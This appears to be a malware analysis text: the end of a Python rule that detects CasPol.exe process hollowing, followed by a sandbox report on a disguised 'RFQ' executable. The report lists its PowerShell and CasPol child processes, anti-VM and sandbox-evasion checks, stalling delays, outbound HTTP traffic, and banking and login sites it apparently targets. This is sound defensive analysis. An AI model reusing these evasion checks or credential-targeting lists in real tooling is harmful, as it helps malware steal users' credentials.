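        ProcessEvent(1006, r"C:\Program Files\Vendor\setup.exe", fw + "\\CasPol.exe",
                     f'"{fw}\\CasPol.exe" -m -lg'),
    ]


if __name__ == "__main__":
    for pid, hits in sorted(run(sample_events()).items()):
        print(pid, ", ".join(hits))
```

The second rule deliberately keys on an empty argument list rather than on the binary name alone: CasPol.exe and RegSvcs.exe are legitimately run by installers and build tooling, but always with arguments, so the empty command line plus a parent outside C:\Windows or C:\Program Files is what separates the hollowing host from normal use.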
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: propsys.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Section loaded: ntmarta.dll
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder  Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe  Static file information: File size 2875465 > 1048576
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe  Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb@H`h source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdbH source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbW source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Drawing.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.ni.pdb source: WER21E4.tmp.dmp.10.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER21E4.tmp.dmp.10.dr
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe  Static PE information: 0x916198D0 [Wed Apr 17 05:40:32 2047 UTC]
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe  Code function: 0_2_00007FF848F0752B push ebx; iretd  0_2_00007FF848F0756A
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe  Code function: 0_2_00007FF848FD0000 push esp; retf 4810h  0_2_00007FF848FD0312

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: unknown  Network traffic detected: HTTP traffic on port 49704 -> 13484
                    Source: unknown  Network traffic detected: HTTP traffic on port 13484 -> 49704
                    Source: unknown  Network traffic detected: HTTP traffic on port 49714 -> 13484
                    Source: unknown  Network traffic detected: HTTP traffic on port 13484 -> 49714
                    Source: unknown  Network traffic detected: HTTP traffic on port 49717 -> 13484
                    Source: unknown  Network traffic detected: HTTP traffic on port 13484 -> 49717
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match; File source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe; Memory allocated: 2DBA8C40000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe; Memory allocated: 2DBC27A0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Memory allocated: 6E0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Memory allocated: 2860000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Memory allocated: A00000 memory reserve | memory write watch
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6146
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3444
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Window / User API: threadDelayed 2646
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; Window / User API: threadDelayed 4588
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848; Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7316; Thread sleep time: -28592453314249787s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1644; Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1276; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: Amcache.hve.10.dr; Binary or memory string: VMware
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: global block list test formVMware20,11696428655
                    Source: Amcache.hve.10.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMWARE
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: Amcache.hve.10.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: Amcache.hve.10.dr; Binary or memory string: vmci.sys
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: AMC password management pageVMware20,11696428655
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: tasks.office.comVMware20,11696428655o
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vmware
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: Amcache.hve.10.dr; Binary or memory string: VMware20,1
                    Source: Amcache.hve.10.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.10.dr; Binary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.10.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: Amcache.hve.10.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.10.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.10.dr; Binary or memory string: VMware PCI VMCI Bus Device
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: Amcache.hve.10.dr; Binary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.10.dr; Binary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.10.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: Amcache.hve.10.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: Amcache.hve.10.dr; Binary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.10.dr; Binary or memory string: vmci.syshbin
                    Source: Amcache.hve.10.dr; Binary or memory string: VMware, Inc.
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: discord.comVMware20,11696428655f
                    Source: Amcache.hve.10.dr; Binary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.10.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.10.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: Amcache.hve.10.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2323017315.000002DBAA7A1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: VMware SVGA II
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: Amcache.hve.10.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: Amcache.hve.10.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: CasPol.exe, 00000005.00000002.2220039755.0000000000778000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: outlook.office.comVMware20,11696428655s
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: Amcache.hve.10.dr; Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.10.dr; Binary or memory string: vmci.syshbin`
                    Source: tmpE9F2.tmp.5.dr; Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
